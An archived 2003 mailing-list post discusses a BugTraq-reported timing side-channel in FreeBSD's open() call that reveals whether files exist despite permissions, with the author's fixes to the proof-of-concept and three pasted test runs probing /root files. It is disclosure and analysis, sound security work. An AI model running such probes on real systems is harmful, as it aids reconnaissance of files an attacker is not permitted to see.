Nathan J. Yoder
2003-Apr-07 12:02 UTC
timing related vunlerability that reveals whether files exist without regard to permissions
There was a recent post to BugTraq (April 2nd) detailing a multi-platform vulnerability. An archived copy of this posting can be found at http://www.securityfocus.com/archive/1/317425. This vulnerability is a timing based attack on system calls that can be used to reveal whether or not a file exists without regard to permissions. The attack works based off the fact that using the open() system call to test whether a file exists will return significantly faster if the file doesn't exist (about 4 times faster in my testing). This vulnerability in itself does not present a serious security risk, however as outlined by the BugTraq post it can be used in conjunction with another attack. Even worse, the idea that such a timing related vulnerability exists and that it wasn't accounted for at all suggests that many other system calls and aspects of various OSes (not just FreeBSD) may be vulnerable to more serious timing related vulnerabilities. Call me paranoid, but in lieu of this, the ssl timing attack (ability to derive the private key), the recent qpopper one (ability to test to see if users exist), my daemon-sense is tingling, telling me that there is going to be a huge flood of timing attacks over the next few years. One of the problems is that compensating for this is not easy because there is no generic solution short of adding intentional delays (like with Matt Blaze's? quantization library), which gives you a fixed performance penalty. TESTING DETAILS I ran the following commands on a FreeBSD 4.7-RELEASE computer using the exploit provided in the BugTraq posting. Provided below is 3 trial runs of the program. Note the time discrepancy between trying to open an existing and non-existent file. NOTE: I needed to remove the O_SYNC flag from the "int flags" line (it doesn't seem to exist on 4.7-R) and I needed to include the <sys/time.h> header file in the exploit to make it work. [njyoder@topcat ~/temp]$ uname -a FreeBSD topcat.mine.nu 4.7-RELEASE-p6 FreeBSD 4.7-RELEASE-p6 #21: Sat Mar 1 06:07:58 EST 2003 njyoder@topcat.mine.nu:/usr/obj/usr/src/sys/TOPCAT i386 [njyoder@topcat ~/temp]$ ./evil [+] creating unreachable [+] creating unreachable/iexist [+] chmod 0'ing unreachable [+] d--------- 2 njyoder users 512 Apr 5 17:29 unreachable/ [+] Timing open() on unreachable/iexist [+] Successful: 83 usecs, got m [+] Timing open() on unreachable/non-existant [+] Failure: 22 usecs, got m [+] Using 35 as our cutoff. [+] testing /root/.bashrc and /root/non-existant [+] /root/.bashrc doesn't exist (29 usecs), got m [+] /root/non-existant doesn't exist (21 usecs), got m [+] cleaning up [njyoder@topcat ~/temp]$ ./evil [+] creating unreachable [+] creating unreachable/iexist [+] chmod 0'ing unreachable [+] d--------- 2 njyoder users 512 Apr 5 17:30 unreachable/ [+] Timing open() on unreachable/iexist [+] Successful: 86 usecs, got m [+] Timing open() on unreachable/non-existant [+] Failure: 23 usecs, got m [+] Using 36 as our cutoff. [+] testing /root/.bashrc and /root/non-existant [+] /root/.bashrc doesn't exist (28 usecs), got m [+] /root/non-existant doesn't exist (22 usecs), got m [+] cleaning up [njyoder@topcat ~/temp]$ ./evil [+] creating unreachable [+] creating unreachable/iexist [+] chmod 0'ing unreachable [+] d--------- 2 njyoder users 512 Apr 5 17:30 unreachable/ [+] Timing open() on unreachable/iexist [+] Successful: 84 usecs, got m [+] Timing open() on unreachable/non-existant [+] Failure: 22 usecs, got m [+] Using 35 as our cutoff. [+] testing /root/.bashrc and /root/non-existant [+] /root/.bashrc doesn't exist (27 usecs), got m [+] /root/non-existant doesn't exist (20 usecs), got m [+] cleaning up ------------------------------------------------ Nathan J. Yoder http://www.gummibears.nu/ http://www.gummibears.nu/files/njyoder_pgp.key ------------------------------------------------
Possibly Parallel Threads
- Bug#603727: xen-hypervisor-4.0-amd64: i386 Dom0 crashes after doing some I/O on local storage (software Raid1 on SAS-drives with mpt2sas driver)
- [PATCH nbdkit 2/3] filters: stats: Measure time per operation
- [PATCH nbdkit 1/3] filters: stats: Show size in GiB, rate in MiB/s
- [PATCH nbdkit v2 1/3] filters: stats: Add size in GiB, show rate in MiB/s
- [PATCH nbdkit v2 2/3] filters: stats: Measure time per operation